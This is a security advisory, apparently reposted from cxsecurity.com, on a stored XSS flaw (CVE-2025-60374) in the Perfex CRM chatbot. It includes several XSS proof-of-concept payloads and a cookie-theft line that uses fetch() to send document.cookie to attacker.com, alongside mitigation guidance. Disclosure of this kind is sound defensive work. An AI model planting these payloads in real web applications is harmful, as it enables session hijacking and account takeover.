Perfex CRM 聊天机器人存在存储型跨站脚本(XSS)漏洞(CVE-2025-60374),允许攻击者注入恶意代码并存储于服务器,在其他用户查看聊天消息时执行。此漏洞可能导致会话劫持、数据泄露及账户接管等问题。建议升级至 3.3.1 及以上版本,并加强输入过滤和输出编码。 2025-10-12 19:56:19 Author: cxsecurity.com(查看原文) 阅读量:126 收藏
Perfex CRM Chatbot Cross Site Scripting# CVE-2025-60374 CVE-2025-60374: Stored Cross-Site Scripting (XSS) in Perfex CRM Chatbot > **⚠️ Security Advisory** > A critical Stored Cross-Site Scripting vulnerability in Perfex CRM's chatbot feature [](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-60374) []() [](https://cwe.mitre.org/data/definitions/79.html) --- ## 📋 Overview A Stored Cross-Site Scripting (XSS) vulnerability has been discovered in Perfex CRM's chatbot feature. This vulnerability allows attackers to inject malicious HTML and JavaScript code that gets stored on the server and executed in victims' browsers when they view chat messages. ## 🎯 Affected Versions - **Product:** Perfex CRM - **Vendor:** Perfex CRM - **Vulnerable Versions:** < 3.3.1 - **Fixed Version:** 3.3.1+ ## 🔍 Vulnerability Details | Attribute | Value | |-----------|-------| | **CVE ID** | CVE-2025-60374 | | **Type** | Stored Cross-Site Scripting (XSS) | | **CWE** | [CWE-79](https://cwe.mitre.org/data/definitions/79.html) | | **Attack Vector** | Network/Remote | | **Authentication** | Required (Low Privilege) | | **User Interaction** | None to Minimal | | **Discoverer** | Ajansha Shankar | ### Description The chatbot's message parameter in Perfex CRM lacks proper input sanitization and output encoding. When users submit messages through the chatbot interface, malicious HTML/JavaScript payloads are stored in the database without adequate filtering and subsequently rendered without proper escaping, leading to code execution in other users' browsers. ### Root Cause - ❌ Insufficient input validation on chatbot message parameter - ❌ Missing output encoding when rendering stored messages - ❌ Session cookies not marked as `HttpOnly` - ❌ Lack of Content Security Policy (CSP) ## 💥 Impact ### Security Implications - **🔓 Session Hijacking:** Attackers can steal session tokens via `document.cookie` access - **👤 Account Takeover:** Complete compromise of victim accounts - **🎭 Privilege Escalation:** Administrator account compromise if admin views malicious message - **📊 Data Exfiltration:** Access to sensitive information in user's browser context - **🎪 Phishing:** Ability to modify page content and redirect users ### CIA Triad Assessment | Factor | Impact | Explanation | |--------|--------|-------------| | **Confidentiality** | 🔴 HIGH | Session tokens and sensitive data can be stolen | | **Integrity** | 🔴 HIGH | Unauthorized actions can be performed as the victim | | **Availability** | 🟡 LOW | Limited impact on system availability | ## 🧪 Proof of Concept ### PoC 1: Basic Image XSS ```html <img src=x onerror=alert('XSS executed!')> ``` ### PoC 2: Interactive Button XSS ```html <button onclick=alert('Click executed!')>Click here</button> ``` ### PoC 3: Auto-playing Embedded Content ```html <iframe width="560" height="315" src="https://www.youtube.com/embed/6B2jvf81LxE?playlist=Gvq4d460C1M&autoplay=1" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen> </iframe> ``` ### PoC 4: Event-based XSS ```html <meter value=2 min=0 max=10 onmouseover=alert('XSS triggered!')> 2 out of 10 </meter> ``` ### Real-World Attack Scenario **Cookie Theft Example:** ```javascript <img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)"> ``` This payload would send the victim's session cookie to an attacker-controlled server, enabling complete account takeover. ## 🛡️ Mitigation ### For End Users 1. **✅ Upgrade Immediately:** Update to Perfex CRM v3.3.1 or later 2. **🔍 Audit Messages:** Review chatbot history for suspicious HTML/JavaScript content 3. **🔄 Reset Sessions:** Force all users to re-authenticate after patching 4. **📝 Monitor Logs:** Check for unusual chatbot activity ### For Developers #### Immediate Fixes ```php // Input Sanitization Example $message = htmlspecialchars($input_message, ENT_QUOTES, 'UTF-8'); // Output Encoding Example echo htmlspecialchars($stored_message, ENT_QUOTES, 'UTF-8'); ``` #### Long-term Security Improvements 1. **Content Security Policy (CSP)** ```http Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; ``` 2. **HttpOnly Cookies** ```php setcookie('session', $value, [ 'httponly' => true, 'secure' => true, 'samesite' => 'Strict' ]); ``` 3. **Input Validation Library** ```php // Use DOMPurify, HTML Purifier, or similar $clean_html = $purifier->purify($dirty_html); ``` ## 📚 References - [CWE-79: Cross-site Scripting (XSS)](https://cwe.mitre.org/data/definitions/79.html) - [OWASP XSS Prevention Cheat Sheet](https://owasp.org/www-community/attacks/xss/) - [CVE-2025-60374 Official Entry](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-60374) ## 👤 Credits **Discovered by:** Ajansha Shankar ## 📧 Contact For questions or additional information: - **LinkedIn:** https://www.linkedin.com/in/ajansha-shankar/
Thanks for you comment!
|
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
Copyright 2025, cxsecurity.com
如有侵权请联系:admin#unsafe.sh